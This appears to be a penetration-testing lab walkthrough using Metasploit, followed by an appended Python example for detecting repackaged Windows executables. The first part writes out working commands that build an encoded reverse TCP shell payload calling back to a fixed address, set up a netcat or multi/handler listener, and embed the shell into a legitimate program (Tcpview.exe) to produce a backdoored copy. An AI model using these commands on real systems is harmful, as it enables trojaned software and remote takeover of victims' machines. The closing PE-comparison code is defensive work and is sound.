Step 1: On TEST-BT4, create an Encoded EXE Payload
./msfpayload windows/shell_reverse_tcp LHOST=131.107.1.252 LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -t exe -o /tmp/payload.exe
Step 2: Copy the newly created Encoded EXE Payload to DEN-WEB2
Step 3: On TEST-BT4, launch Netcat in Listening Mode
nc -v -l -p 443
or
cd /pentest/exploits/framework3
./msfconsole
msf > use multi/handler
msf > set PAYLOAD windows/shell_reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
Step 4: On DEN-WEB2, launch the Encoded EXE Payload (payload.exe)
You should see a reverse connection from DEN-WEB2 to TEST-BT4.
Advanced Topic: Embedding Legitimate Program with Encoded Payload (Reverse TCP Shell Backdoor)
Legitimate: Tcpview.exe
Backdoor: Tcpview2.exe
./msfpayload windows/shell/reverse_tcp LHOST=131.107.1.252 LPORT=443 R | ./msfencode -t exe -x /tmp/Tcpview.exe -o /tmp/Tcpview2.exe
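Added example (not part of the original post): a defender who holds a known-good copy of a program such as Tcpview.exe can tell a repackaged copy such as Tcpview2.exe apart by comparing the file hash, the entry point and the section table. The function names, the constructed sample images and the ".xyz" section name are assumptions made for this illustration.

```python
import hashlib
import struct

SECTION = "<8s4I12xI"  # section header: name, vsize, vaddr, rawsize, rawptr, flags

def pe_summary(data):
    """Whole-file SHA-256, entry point RVA and per-section (flags, hash) of a PE image."""
    pe = struct.unpack_from("<I", data, 0x3C)[0] if len(data) >= 0x40 else 0  # e_lfanew
    if data[:2] != b"MZ" or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    _, nsec, _, _, _, optsz, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)  # COFF header
    entry, = struct.unpack_from("<I", data, pe + 40)  # AddressOfEntryPoint
    secs = {}
    for i in range(nsec):
        name, _, _, rsize, rptr, flags = struct.unpack_from(SECTION, data, pe + 24 + optsz + 40 * i)
        digest = hashlib.sha256(data[rptr:rptr + rsize]).hexdigest()
        secs[name.rstrip(b"\0").decode("ascii", "replace")] = (flags, digest)
    return {"sha256": hashlib.sha256(data).hexdigest(), "entry": entry, "sections": secs}

def diff_pe(good, suspect):
    """List how `suspect` departs from the known-good image."""
    a, b = pe_summary(good), pe_summary(suspect)
    out = ["file hash differs"] if a["sha256"] != b["sha256"] else []
    if a["entry"] != b["entry"]:
        out.append("entry point %#x -> %#x" % (a["entry"], b["entry"]))
    for name, facts in b["sections"].items():
        if name not in a["sections"]:
            out.append("new section " + name)
        elif a["sections"][name] != facts:
            out.append("section %s changed" % name)
    return out

def build_sample(entry, sections):  # constructed PE headers plus raw data, demo input only
    hdr = bytearray(0x40 + 24 + 0xE0 + 40 * len(sections))
    hdr[:2], hdr[0x40:0x44] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    struct.pack_into("<I", hdr, 0x68, entry)
    body = b""
    for i, (name, flags, raw) in enumerate(sections):
        struct.pack_into(SECTION, hdr, 0x138 + 40 * i, name, len(raw),
                         0x1000 * (i + 1), len(raw), len(hdr) + len(body), flags)
        body += raw
    return bytes(hdr) + body

BASE = [(b".text", 0x60000020, b"\x90" * 16), (b".data", 0xC0000040, b"\0" * 8)]
GOOD = build_sample(0x1000, BASE)  # constructed stand-in for the vendor's file
SUSPECT = build_sample(0x3000, BASE + [(b".xyz", 0xE0000020, b"\xcc" * 16)])  # constructed
print("\n".join(diff_pe(GOOD, SUSPECT)))
```

For real files, pass the bytes read from the vendor's download and from the copy found on the host; an empty result means the two images match.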